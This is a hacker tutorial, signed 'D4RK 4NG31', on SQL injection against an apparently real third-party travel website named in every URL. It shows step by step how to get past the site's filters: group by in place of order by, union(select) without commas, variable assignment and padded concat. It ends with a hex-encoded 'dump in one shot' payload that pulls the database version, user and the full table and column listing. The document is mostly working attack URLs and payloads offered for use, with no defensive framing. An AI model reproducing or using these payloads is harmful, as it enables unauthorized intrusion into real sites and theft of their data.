SQLi Challenge Solution 1

First Hello to all :) from D4RK 4NG31

Target : http://exoticindiatours.in/pckge-details.php?id=2

Now, Let's Start

Finding which comment is working

http://exoticindiatours.in/pckge-details.php?id=2' --+ ====> error
http://exoticindiatours.in/pckge-details.php?id=2 --   ====> no error it's mean comment (--) is working..

-- = # mostly

So, we don't have to use any comment :))

Now it's time to find columns

First we'll use order by

http://exoticindiatours.in/pckge-details.php?id=2 order by 122 ====> Blocked

order by function is blocked.. so, we'll use group by instead of order by

http://exoticindiatours.in/pckge-details.php?id=2 group by 122 ====> showing error it's mean it's working :D

http://exoticindiatours.in/pckge-details.php?id=2 group by 2 ====> Error

http://exoticindiatours.in/pckge-details.php?id=2 group by 1 ====> No error

So, The vuln column is 1

Now, time to use union select

http://exoticindiatours.in/pckge-details.php?id=2 union select 1 ===> Blocked
http://exoticindiatours.in/pckge-details.php?id=2 /*!50000union*/ /*!50000select*/ ====> again blocked

seems Site block special chars (*,!)

Now It's time to do encryption.

For this we'll use union(select

In this .. We'll type columns like this " union(select (1),(2),(3),(4),(5))

Let's try..

http://exoticindiatours.in/pckge-details.php?id=2 union(select (1)) ====> :)) working....

Now it's time to use DIOS

as i already told u concat func is used for print multiple queries

http://exoticindiatours.in/pckge-details.php?id=2 union(select (concat(version(),database(),user()))

We get an error... seems site is blocking ( , ) comma

To bypass we'll use variable method :

and@x:=

Let's try this :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat(version(),database(),user()) union(select (@x))

again error

Let's try Waf. First we'll see which word is blocking site :

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat====(version(),database(),user()) union(select (@x)) ===> No error

Concat( = Blocked

For this we'll use + with great amount

Let's do it:

http://exoticindiatours.in/pckge-details.php?id=2 and@x:=concat+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++(0x3c703e496e6a6563746564206279204434524b20344e4733313c2f703e,0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,user())+UNION(SELECT(@x))#

Done :) Happy Injecting ;) Tutorial by D4RK 4NG31

Easy and Simple Way to make DIOS

First We'll Print Our Cyber name

To use html tags we'll use them between apostrophes ( ' ) like '<p>Injected by D4RK 4NG31</p>'

And we'll use Concat function for multiple queries

So, Let's Start..

Concat('<h2>Injected by D4RK 4NG31</h2>') :D Done

Now For Print Version,Database,User .... We'll use these commands @@version,database(),user() and will use <br> for new line :)

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>')

Done :D we've printed all things now it's time to print tables and columns

Now for this we'll use this query

(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database())

Now add this query in DIOS

Concat('<h2>Injected by D4RK 4NG31</h2>','<p>Version ::</p>',@@version,'<br>','<p>Database ::</p>',database(),'<br>','<p>User ::</p>',user(),'<br>',(select group_concat(column_name,'<br>',table_name) from information_schema.columns where table_schema=database()))

HTML tags into hex :

Concat(0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,@@version,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,database(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,user(),0x3c62723e,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()))

DIOS completed now Happy Injecting :)))

Tutorial by D4RK 4NG31 ;)